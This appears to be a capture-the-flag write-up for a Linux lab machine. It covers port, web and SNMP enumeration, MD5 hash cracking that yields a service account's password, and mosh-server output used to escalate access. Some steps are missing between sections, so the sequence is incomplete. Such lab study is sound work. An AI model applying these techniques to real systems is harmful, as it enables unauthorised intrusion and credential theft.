OS: Linux Difficulty: Easy Points: 20 Release: 22 Dec 2024 IP: 10.10.11.48
🕵️ Enumeration & Initial Access
🔍 Nmap Scan
1 2 3
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))
22 – SSH
80 – Apache Web Server (default page)
🌐 Web Enumeration
Tried directory brute-forcing and subdomain enumeration, but didn’t find anything of interest.
1
gobuster dir -u http://10.10.11.48/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
No useful directories discovered.
📡 SNMP Enumeration
I ran another Nmap scan targeting UDP ports and discovered SNMP was enabled:
1 2
PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Nmap output also indicated the hostname: UnDerPass.htb
Used snmpbulkwalk to extract additional details:
1
snmpbulkwalk -c public -v2c 10.10.11.48 .
Output (relevant):
1 2 3
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb" iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!" iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
Found the username: steve@underpass.htb and a hint that the site runs daloRADIUS.
User Flag
Direct access to /daloradius/ resulted in a 403 Forbidden. But accessing the login page directly worked:
john hash --wordlist=/mnt/f/ctf/wordlists/rockyou.txt --format=Raw-MD5 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3]) Warning: no OpenMP support for this hashtype, consider --fork=8 Press 'q' or Ctrl-C to abort, almost any other key for status underwaterfriends (svcMosh) 1g 0:00:00:01 DONE (2025-05-09 16:28) 0.6849g/s 2044Kp/s 2044Kc/s 2044KC/s undiamassinverte..underarrest Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed.
mosh-server (mosh 1.3.2) [build mosh 1.3.2] Copyright 2012 Keith Winstein <mosh-devel@mit.edu> License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 41245]
Used mosh-client to connect locally:
1 2
svcMosh@underpass:~$ mosh-client 127.0.0.1 60001 MOSH_KEY environment variable not found.
System information as of Fri May 9 10:36:10 AM UTC 2025
System load: 0.0 Processes: 226 Usage of /: 58.7% of 6.56GB Users logged in: 0 Memory usage: 18% IPv4 address for eth0: 10.10.11.48 Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings